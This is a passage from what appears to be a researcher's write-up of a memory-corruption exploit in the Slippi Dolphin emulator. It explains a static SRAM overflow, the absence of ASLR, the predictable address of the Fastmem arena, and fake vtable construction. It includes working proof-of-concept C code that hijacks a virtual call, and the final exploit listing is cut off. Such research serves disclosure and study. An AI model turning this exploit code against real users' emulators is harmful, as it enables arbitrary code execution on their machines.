<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">flash_id</span><span>[</span><span style="color: #B5CEA8;">2</span><span>][</span><span style="color: #B5CEA8;">12</span><span>];</span><span style="color: #6A9955;"> // flash_id[2][12] 96bit memorycard unlock flash ID</span></span>
<span class="giallo-l"><span> u32 wirelessKbd_id;</span><span style="color: #6A9955;"> // Device ID of last connected wireless keyboard</span></span>
<span class="giallo-l"><span> u16 </span><span style="color: #9CDCFE;">wirelessPad_id</span><span>[</span><span style="color: #B5CEA8;">4</span><span>];</span><span style="color: #6A9955;"> // 16-bit device ID of last connected pad.</span></span>
<span class="giallo-l"><span> u8 dvderr_code;</span><span style="color: #6A9955;"> // last non-recoverable error from DVD interface</span></span>
<span class="giallo-l"><span> u8 __padding0;</span><span style="color: #6A9955;"> // reserved</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">flashID_chksum</span><span>[</span><span style="color: #B5CEA8;">2</span><span>];</span><span style="color: #6A9955;"> // 8-bit checksum of unlock flash ID</span></span>
<span class="giallo-l"><span> u32 __padding1;</span><span style="color: #6A9955;"> // padding</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"><span>};</span></span></code></pre>
<p>And <code>g_SRAM</code> is defined as a global variable near the top of <code>EXI.cpp</code>, making this a static memory overflow:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #6A9955;">// Copyright 2008 Dolphin Emulator Project</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Licensed under GPLv2+</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Refer to the license.txt file included.</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// ...</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span>SRAM g_SRAM;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">bool</span><span> g_SRAM_netplay_initialized </span><span style="color: #D4D4D4;">=</span><span style="color: #569CD6;"> false</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">namespace</span><span> ExpansionInterface</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// ...</span></span></code></pre>
<p>Looking at a locally compiled build of Slippi Dolphin, these are the fields immediately following <code>g_SRAM</code>:</p>
<pre class="c41">
<code style="white-space: pre; font-family: monospace;" class="c1 c41"><span class="c46">.data:0000000001BD7E30 </span><span class="c3">; SRAM g_SRAM
</span><span class="c46">.data:0000000001BD7E30 </span><span class="c7">?g_SRAM@@3TSRAM@@A SRAM <</span><span class="c9">?> </span><span class="c15">; DATA XREF: Header::Header(int,ushort,bool)+46↑o
</span><span class="c46">.data:0000000001BD7E30 </span><span class="c15">; NetPlayServer::OnConnect(_ENetPeer *)+3E4↑o ...
</span><span class="c46">.data:0000000001BD7E70 </span><span class="c3">; bool g_SRAM_netplay_initialized
</span><span class="c46">.data:0000000001BD7E70 </span><span class="c7">?g_SRAM_netplay_initialized@@3_NA </span><span class="c32">db </span><span class="c9">? </span><span class="c15">; DATA XREF: ExpansionInterface::Init(void)+1F↑r
</span><span class="c46">.data:0000000001BD7E70 </span><span class="c15">; NetPlayServer::OnConnect(_ENetPeer *)+380↑r ...
</span><span class="c46">.data:0000000001BD7E71 </span><span class="c32">align </span><span class="c31">8
</span><span class="c46">.data:0000000001BD7E78 </span><span class="c3">; std::map<int,std::string> quickChatOptions_103
</span><span class="c46">.data:0000000001BD7E78 </span><span class="c7">quickChatOptions_103 std::map<int,std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::less<int>,std::allocator<std::pair<int const ,std::basic_string<char,std::char_traits<char>,std::allocator<char> > > > > <</span><span class="c9">?>
</span><span class="c46">.data:0000000001BD7E78 </span><span class="c15">; DATA XREF: _dynamic_initializer_for__quickChatOptions___103+81↑w
</span><span class="c46">.data:0000000001BD7E78 </span><span class="c15">; _dynamic_initializer_for__quickChatOptions___103+AD↑w ...
</span><span class="c46">.data:0000000001BD7E88 </span><span class="c3">; CoreTiming::EventType *ExpansionInterface::changeDevice
</span><span class="c46">.data:0000000001BD7E88 </span><span class="c7">ExpansionInterface__changeDevice </span><span class="c32">dq </span><span class="c9">? </span><span class="c15">; DATA XREF: ExpansionInterface::ChangeDevice(uchar,TEXIDevices,uchar)+24↑r
</span><span class="c46">.data:0000000001BD7E88 </span><span class="c15">; ExpansionInterface::ChangeDevice(uchar,TEXIDevices,uchar)+43↑r ...
</span><span class="c46">.data:0000000001BD7E90 </span><span class="c3">; CoreTiming::EventType *ExpansionInterface::updateInterrupts
</span><span class="c46">.data:0000000001BD7E90 </span><span class="c7">ExpansionInterface__updateInterrupts </span><span class="c32">dq </span><span class="c9">?
</span><span class="c46">.data:0000000001BD7E90 </span><span class="c15">; DATA XREF: ExpansionInterface::Init(void)+25B↑w
</span><span class="c46">.data:0000000001BD7E90 </span><span class="c15">; ExpansionInterface::ScheduleUpdateInterrupts(CoreTiming::FromThread,int)+9↑r
</span><span class="c46">.data:0000000001BD7E98 </span><span class="c3">; std::array<std::unique_ptr<CEXIChannel>,3> ExpansionInterface::g_Channels
</span><span class="c46">.data:0000000001BD7E98 </span><span class="c7">ExpansionInterface__g_Channels std::array<std::unique_ptr<CEXIChannel,std::default_delete<CEXIChannel> >,3> <</span><span class="c9">?>
</span><span class="c46">.data:0000000001BD7E98 </span><span class="c15">; DATA XREF: ExpansionInterface__ChangeDeviceCallback+20↑o
</span><span class="c46">.data:0000000001BD7E98 </span><span class="c15">; ExpansionInterface::DoState(PointerWrap &)+12↑o ...</span>
</code><style type="text/css">
/* line-fg-default */
.c1 { color: #AAAAAA; }
/* line-bg-default */
.c41 { background-color: #2D2D2D; }
/* line-pfx-data */
.c46 { color: #7C7C61; }
/* line-fg-repeatable-comment */
.c3 { color: #82607E; }
/* line-fg-regular-data-name */
.c7 { color: #EBEBB9; }
/* line-fg-punctuation */
.c9 { color: silver; }
/* line-fg-keyword */
.c32 { color: #ABABAB; }
/* line-fg-data-xref */
.c15 { color: #7C7C61; }
/* line-fg-numlit-in-data */
.c31 { color: #D25032; }
</style></pre>
<p><code>quickChatOptions</code> doesn't appear to be a good corruption target since there wouldn't be any function pointers to mess with, and it's only used by a config menu that isn't even accessible in Playback builds. <code>ExpansionInterface::changeDevice</code> is a callback, which seems more promising, but it only gets called when an EXI device gets changed during emulation, which can only happen from the user messing with config menus or savestates. <code>updateInterrupts</code> is also a callback, but that only gets called from ethernet or microphone EXI devices, neither of which are enabled by default.</p>
<p>Finally, this leaves <code>ExpansionInterface::g_Channels</code>. <code>CEXIChannel</code> doesn't contain any function pointers on its own, but it does contain pointers to <code>IEXIDevice</code> objects, which have plenty of virtual functions to overwrite.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #6A9955;">// Devices</span></span>
<span class="giallo-l"><span style="color: #569CD6;">enum</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> NUM_DEVICES</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 3</span></span>
<span class="giallo-l"><span>};</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span>std::array</span><span style="color: #D4D4D4;"><</span><span>std::unique_ptr</span><span style="color: #D4D4D4;"><</span><span>IEXIDevice</span><span style="color: #D4D4D4;">></span><span>, NUM_DEVICES</span><span style="color: #D4D4D4;">></span><span> m_devices;</span></span></code></pre>
<p>So, the plan here is to create a fake <code>CEXIChannel</code> populated with fake <code>IEXIDevice</code> objects with virtual functions that point to a ROP chain. Though, I'll have to figure out how to get the base addresses of both the main executable and the emulated main RAM before I can do any of that. It would be really nice if I didn't have to deal with leaking addresses, though...</p>
<p>Who am I kidding? This version of Dolphin is 64-bit and gets compiled with Visual Studio 2019. Obviously, there's gonna be ASLR! Still, I guess it doesn't hurt to check.</p>
<p><img src="/img/slippirce/lolnoaslr.png" alt="" /></p>
<p>It turns out that Dolphin didn't have ASLR since a <a rel="external" href="https://github.com/dolphin-emu/dolphin/commit/ccd30024b30c71743a2c588ccfd748d017a099da#diff-e82c532fb1e912b5e01b59a2b66cf2febaac9c690b7b4de3f78482b8a59ced80">VS2013 update in 2013</a> and didn't get it back until <a rel="external" href="https://github.com/dolphin-emu/dolphin/pull/5271">June 2017</a>. The last time Faster Melee synced with Ishiiruka was about a month after this pull request got merged, but they synced it with its "Stable" branch, which didn't have this commit in it. Ouch!</p>
<p><img src="/img/slippirce/lolyesaslr.png" alt="" /></p>
<p>Anyway, I still need to find where the emulated main RAM is in memory to do anything useful, so let's see how I can get that.</p>
<p>Dolphin uses a very interesting method of ensuring that its emulated memory accesses are as fast as possible. Traditionally, given a hardcoded address map, an emulator would manually check the ranges on each memory access to see which region of memory it should go to. Doing this for every single memory access is quite slow, so Dolphin's developers came up with a trick called "Fastmem".</p>
<p>First, a massive 16GB region of address space is reserved <em>(not allocated!)</em>. This doesn't give it any backing memory, but just reserves that part of the address space for use later.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #4EC9B0;">u8</span><span style="color: #569CD6;">*</span><span> MemArena::</span><span style="color: #DCDCAA;">FindMemoryBase</span><span>()</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Non-Win64 omitted</span></span>
<span class="giallo-l"><span> u8</span><span style="color: #D4D4D4;">*</span><span> base </span><span style="color: #D4D4D4;">=</span><span> (u8</span><span style="color: #D4D4D4;">*</span><span>)</span><span style="color: #DCDCAA;">VirtualAlloc</span><span>(</span><span style="color: #B5CEA8;">0</span><span>,</span><span style="color: #B5CEA8;"> 0x400000000</span><span>, MEM_RESERVE, PAGE_READWRITE);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> VirtualFree</span><span>(base,</span><span style="color: #B5CEA8;"> 0</span><span>, MEM_RELEASE);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span> base;</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Then, parts of that reserved region are carved out and allocated for the regions with backing memory.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #569CD6;">static bool</span><span style="color: #DCDCAA;"> Memory_TryBase</span><span>(</span><span style="color: #4EC9B0;">u8</span><span style="color: #569CD6;">*</span><span style="color: #9CDCFE;"> base</span><span>,</span><span style="color: #4EC9B0;"> MemoryView</span><span style="color: #569CD6;">*</span><span style="color: #9CDCFE;"> views</span><span>,</span><span style="color: #569CD6;"> int</span><span style="color: #9CDCFE;"> num_views</span><span>,</span><span style="color: #4EC9B0;"> u32</span><span style="color: #9CDCFE;"> flags</span><span>,</span><span style="color: #4EC9B0;"> MemArena</span><span style="color: #569CD6;">*</span><span style="color: #9CDCFE;"> arena</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // OK, we know where to find free space. Now grab it!</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // We just mimic the popular BAT setup.</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> int</span><span> i;</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span> num_views; i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span> MemoryView</span><span style="color: #D4D4D4;">*</span><span> view </span><span style="color: #D4D4D4;">= &</span><span style="color: #9CDCFE;">views</span><span>[i];</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> void</span><span style="color: #D4D4D4;">*</span><span> view_base;</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> bool</span><span> use_sw_mirror;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> SKIP</span><span>(flags,</span><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">flags</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;">#if</span><span style="color: #DCDCAA;"> _ARCH_64</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // On 64-bit, we map the same file position multiple times, so we</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // don't need the software fallback for the mirrors.</span></span>
<span class="giallo-l"><span> view_base </span><span style="color: #D4D4D4;">=</span><span> base </span><span style="color: #D4D4D4;">+</span><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">virtual_address</span><span>;</span></span>
<span class="giallo-l"><span> use_sw_mirror </span><span style="color: #D4D4D4;">=</span><span style="color: #569CD6;"> false</span><span>;</span></span>
<span class="giallo-l"><span style="color: #C586C0;">#else</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // On 32-bit, we don't have the actual address space to store all</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // the mirrors, so we just map the fallbacks somewhere in our address</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // space and use the software fallbacks for mirroring.</span></span>
<span class="giallo-l"><span> view_base </span><span style="color: #D4D4D4;">=</span><span> base </span><span style="color: #D4D4D4;">+</span><span> (</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">virtual_address</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0x3FFFFFFF</span><span>);</span></span>
<span class="giallo-l"><span> use_sw_mirror </span><span style="color: #D4D4D4;">=</span><span style="color: #569CD6;"> true</span><span>;</span></span>
<span class="giallo-l"><span style="color: #C586C0;">#endif</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (use_sw_mirror </span><span style="color: #D4D4D4;">&&</span><span> (</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">flags</span><span style="color: #D4D4D4;"> &</span><span> MV_MIRROR_PREVIOUS))</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">view_ptr</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> views</span><span>[i </span><span style="color: #D4D4D4;">-</span><span style="color: #B5CEA8;"> 1</span><span>].</span><span style="color: #9CDCFE;">view_ptr</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> else</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">mapped_ptr</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> arena</span><span>-></span><span style="color: #DCDCAA;">CreateView</span><span>(</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">shm_position</span><span>,</span><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">size</span><span>, view_base);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">view_ptr</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> view</span><span>-></span><span style="color: #9CDCFE;">mapped_ptr</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #D4D4D4;">!</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">view_ptr</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Argh! ERROR! Free what we grabbed so far so we can try again.</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> MemoryMap_Shutdown</span><span>(views, i </span><span style="color: #D4D4D4;">+</span><span style="color: #B5CEA8;"> 1</span><span>, flags, arena);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span style="color: #569CD6;"> false</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">out_ptr</span><span>)</span></span>
<span class="giallo-l"><span style="color: #D4D4D4;"> *</span><span>(</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">out_ptr</span><span>)</span><span style="color: #D4D4D4;"> =</span><span> (u8</span><span style="color: #D4D4D4;">*</span><span>)</span><span style="color: #9CDCFE;">view</span><span>-></span><span style="color: #9CDCFE;">view_ptr</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span style="color: #569CD6;"> true</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Since that massive reserved block can fit the whole 32-bit address space <em>(4GB for address translation off, 4GB for it on, and 4GB + 4GB of unmapped padding after them just in case)</em>, the JIT can then (ab)use the host's MMU to automatically translate addresses to the right place by using that region as a base for a 32-bit offset. If any memory access hits unmapped host memory (e.g., MMIO) within that region, the JIT goes and patches the memory access to use the slower method and tries again. Since most memory accesses only access main RAM, this is a net win!</p>
<p>Fastmem is a really cool optimization, but how does that help with the exploit? Well, despite having a whole 48 bits of address space to work with, Windows only ever seems to try to reserve that massive chunk of memory at the lowest address it can. There isn't a whole lot allocated by Dolphin or any of its libraries before booting a game, so there isn't much fragmentation in the address space. Near the top of that 32-bit address space is <a rel="external" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/ns-ntddk-kuser_shared_data"><code>KUSER_SHARED_DATA</code></a>, which is always at <code>0x7FFEF000</code> no matter what. There's a massive gap in address space between the end of <code>KUSER_SHARED_DATA</code> and the DLLs that get loaded in the <code>0x007FF...</code> range due to ASLR, so where does Windows put the Fastmem arena?</p>
<p><img src="/img/slippirce/fastmem.png" alt="" /></p>
<p>Right after <code>KUSER_SHARED_DATA</code> at <code>0x7FFFF000</code> every single time, of course! This isn't a fluke; it really is this consistent on all of the PCs I've tested.</p>
<p>Now that I know that I don't need any leaks, let's start poking around with this fake <code>CEXIChannel</code>.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="c"><span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <string.h></span></span>
<span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <gccore.h></span></span>
<span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <ogc/machine/processor.h></span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Adapted from internal libogc code</span></span>
<span class="giallo-l"><span style="color: #569CD6;">static void</span><span style="color: #DCDCAA;"> __sram_write</span><span>(</span><span style="color: #569CD6;">void</span><span style="color: #D4D4D4;"> *</span><span style="color: #9CDCFE;">buffer</span><span>, u32 </span><span style="color: #9CDCFE;">size</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Lock</span><span>(EXI_CHANNEL_0, EXI_DEVICE_1,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Select</span><span>(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> u32 cmd </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0xA0000100</span><span>;</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Imm</span><span>(EXI_CHANNEL_0,</span><span style="color: #D4D4D4;"> &</span><span>cmd,</span><span style="color: #B5CEA8;"> 4</span><span>, EXI_WRITE,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Sync</span><span>(EXI_CHANNEL_0);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Dma</span><span>(EXI_CHANNEL_0, buffer, size, EXI_WRITE,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">typedef struct</span><span> {</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">gap0</span><span>[</span><span style="color: #B5CEA8;">0x18</span><span>];</span></span>
<span class="giallo-l"><span> u64 </span><span style="color: #9CDCFE;">m_devices</span><span>[</span><span style="color: #B5CEA8;">3</span><span>];</span><span style="color: #6A9955;"> // IEXIDevice*[3]</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">gap30</span><span>[</span><span style="color: #B5CEA8;">0x8</span><span>];</span></span>
<span class="giallo-l"><span>} CEXIChannel;</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;">static_assert</span><span>(</span><span style="color: #569CD6;">sizeof</span><span>(CEXIChannel)</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 0x38</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;">#define</span><span style="color: #DCDCAA;"> RAM_BASE</span><span style="color: #B5CEA8;"> 0x7FFF0000uL</span></span>
<span class="giallo-l"><span style="color: #C586C0;">#define</span><span style="color: #DCDCAA;"> TARGET_PTR_OFFSET</span><span style="color: #B5CEA8;"> 0x58</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">static</span><span> u64 </span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(</span><span style="color: #569CD6;">const void</span><span style="color: #D4D4D4;">*</span><span style="color: #9CDCFE;"> input</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span> RAM_BASE </span><span style="color: #D4D4D4;">+</span><span> ((u32)input </span><span style="color: #D4D4D4;">&</span><span style="color: #B5CEA8;"> 0x7FFFFFFF</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">int</span><span style="color: #DCDCAA;"> main</span><span>() {</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">fake_vtbl</span><span>[</span><span style="color: #B5CEA8;">256</span><span>];</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span> i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span style="color: #B5CEA8;"> 256</span><span>; i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> fake_vtbl</span><span>[i]</span><span style="color: #D4D4D4;"> =</span><span> i;</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Addresses have to be byteswapped because PowerPC is big endian</span></span>
<span class="giallo-l"><span> u64 fake_device </span><span style="color: #D4D4D4;">=</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_vtbl));</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span> CEXIChannel fake_channel;</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> memset</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_channel,</span><span style="color: #B5CEA8;"> 0x99</span><span>,</span><span style="color: #569CD6;"> sizeof</span><span>(fake_channel));</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span> i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span style="color: #B5CEA8;"> 3</span><span>; i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> fake_channel</span><span>.</span><span style="color: #9CDCFE;">m_devices</span><span>[i]</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_device));</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Overwrites g_Channels[0]</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> static char</span><span style="color: #9CDCFE;"> buf</span><span>[TARGET_PTR_OFFSET </span><span style="color: #D4D4D4;">+</span><span style="color: #B5CEA8;"> 8</span><span>];</span></span>
<span class="giallo-l"><span> u64 ptr </span><span style="color: #D4D4D4;">=</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_channel));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> memcpy</span><span>(buf </span><span style="color: #D4D4D4;">+</span><span> TARGET_PTR_OFFSET,</span><span style="color: #D4D4D4;"> &</span><span>ptr,</span><span style="color: #569CD6;"> sizeof</span><span>(ptr));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> __sram_write</span><span>(buf,</span><span style="color: #569CD6;"> sizeof</span><span>(buf));</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Running this shows that there's a trivially controllable virtual call. Nice!</p>
<p><img src="/img/slippirce/vtblcheck.png" alt="" /></p>
<p>Specifically, this is happening in <code>ExpansionInterface::UpdateInterrupts()</code>, which gets called immediately after the broken DMA transfer completes. <code>IsInterruptSet</code> is the controllable virtual call on the fake <code>IEXIDevice</code> object.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #569CD6;">void</span><span style="color: #DCDCAA;"> UpdateInterrupts</span><span>()</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Interrupts are mapped a bit strangely:</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Channel 0 Device 0 generates interrupt on channel 0</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Channel 0 Device 2 generates interrupt on channel 2</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Channel 1 Device 0 generates interrupt on channel 1</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> g_Channels</span><span>[</span><span style="color: #B5CEA8;">2</span><span>]-></span><span style="color: #DCDCAA;">SetEXIINT</span><span>(</span><span style="color: #9CDCFE;">g_Channels</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]-></span><span style="color: #DCDCAA;">GetDevice</span><span>(</span><span style="color: #B5CEA8;">4</span><span>)-></span><span style="color: #DCDCAA;">IsInterruptSet</span><span>());</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> bool</span><span> causeInt </span><span style="color: #D4D4D4;">=</span><span style="color: #569CD6;"> false</span><span>;</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">auto</span><span style="color: #D4D4D4;">&</span><span> channel : g_Channels)</span></span>
<span class="giallo-l"><span> causeInt </span><span style="color: #D4D4D4;">|=</span><span style="color: #9CDCFE;"> channel</span><span>-></span><span style="color: #DCDCAA;">IsCausingInterrupt</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> ProcessorInterface::</span><span style="color: #DCDCAA;">SetInterrupt</span><span>(ProcessorInterface::INT_CAUSE_EXI, causeInt);</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>I'm not going to go through the whole process of how I wrote the ROP chain for this since that isn't very interesting, but here's the final exploit code:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <string.h></span></span>
<span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <gccore.h></span></span>
<span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <ogc/machine/processor.h></span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Adapted from internal libogc code</span></span>
<span class="giallo-l"><span style="color: #569CD6;">static void</span><span style="color: #DCDCAA;"> __sram_write</span><span>(</span><span style="color: #569CD6;">void *</span><span style="color: #9CDCFE;">buffer</span><span>,</span><span style="color: #4EC9B0;"> u32</span><span style="color: #9CDCFE;"> size</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Lock</span><span>(EXI_CHANNEL_0, EXI_DEVICE_1,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Select</span><span>(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> u32 cmd </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0xA0000100</span><span>;</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Imm</span><span>(EXI_CHANNEL_0,</span><span style="color: #D4D4D4;"> &</span><span>cmd,</span><span style="color: #B5CEA8;"> 4</span><span>, EXI_WRITE,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Sync</span><span>(EXI_CHANNEL_0);</span></span>
